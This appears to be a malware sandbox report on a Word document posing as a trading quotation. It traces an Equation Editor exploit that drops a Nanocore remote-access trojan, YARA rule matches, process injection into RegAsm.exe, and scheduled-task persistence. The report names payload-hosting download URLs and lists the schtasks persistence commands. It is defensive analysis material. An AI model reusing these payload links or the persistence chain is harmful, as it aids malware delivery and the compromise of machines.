      Source: RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
      Source: RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
      Source: unknownDNS traffic detected: queries for: bit.ly
      Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
      Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
      Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
      Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
      Source: RegAsm.exe, 00000006.00000002.2371916923.000000000083D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
      Source: RegAsm.exe, 00000006.00000002.2372610828.0000000002790000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371587310.0000000001BE0000.00000002.00000001.sdmp, RegAsm.exe, 0000000F.00000002.2323283664.0000000002500000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: RegAsm.exe, 00000006.00000002.2372610828.0000000002790000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371587310.0000000001BE0000.00000002.00000001.sdmp, RegAsm.exe, 0000000F.00000002.2323283664.0000000002500000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
      Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmpString found in binary or memory: https://ibkebw.dm.files.1drv.com/
      Source: RegAsm.exe, 00000006.00000002.2382485610.000000001DC80000.00000004.00000001.sdmpString found in binary or memory: https://ibkebw.dm.files.1drv.com/y
      Source: RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmp, RegAsm.exe, 00000006.00000002.2382485610.000000001DC80000.00000004.00000001.sdmpString found in binary or memory: https://ibkebw.dm.files.1drv.com/y4mkt1ePYl5p-A97ciot0bQ59hcBfLkczVR077g5LVTnsSoRxe1bs39ErOjDRD_qmHQ
      Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
      Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/E
      Source: RegAsm.exe, RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=802AC8A73EEC8C8E&resid=802AC8A73EEC8C8E%21110&authkey=AK1w6-P
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: 2ZKf4aq[1].htm.2.drString found in binary or memory: https://u.teknik.io/wREzo.txt
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
      Source: RegAsm.exe, 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY
      Source: Yara matchFile source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.RegAsm.exe.130000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.1e3c125c.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txtJump to dropped file
      Source: C:\Users\Public\69577.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\69577.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Users\user\subfolder1\filename1.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Users\user\subfolder1\filename1.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_00287311 NtProtectVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_0028725D NtProtectVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_002872B9 NtProtectVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_00287322 NtProtectVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_007B180A NtQuerySystemInformation,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_007B17CF NtQuerySystemInformation,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_00792418
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_00799C03
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_00798CF0
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_007998F0
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_007938C8
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_0079B5C0
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_00793020
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_007930E7
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_007999B7
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_1E370FF6
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_006B01B7
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 17_2_003A01B7
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 20_2_002701B7
      Source: filename1.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: filename1.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: filename1.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.RegAsm.exe.130000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.130000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.1e3c125c.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.1e3c125c.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@19/25@6/3
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_007B149A AdjustTokenPrivileges,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_007B1463 AdjustTokenPrivileges,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Program Files (x86)\SMTP ServiceJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$OTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{92421eeb-c456-44c2-ab8d-5a66d7e5ab97}
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB2DA.tmpJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................0.......................(.P.....................@.......8.................................................................).....
      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................`."...............".....(.P.............<.......................................................................................
      Source: C:\Users\Public\69577.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\subfolder1\filename1.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docVirustotal: Detection: 39%
      Source: QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.docReversingLabs: Detection: 25%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknownProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'
      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp'
      Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
      Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
      Source: unknownProcess created: C:\Users\user\subfolder1\filename1.exe 'C:\Users\user\subfolder1\filename1.exe'
      Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
      Source: C:\Users\Public\69577.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
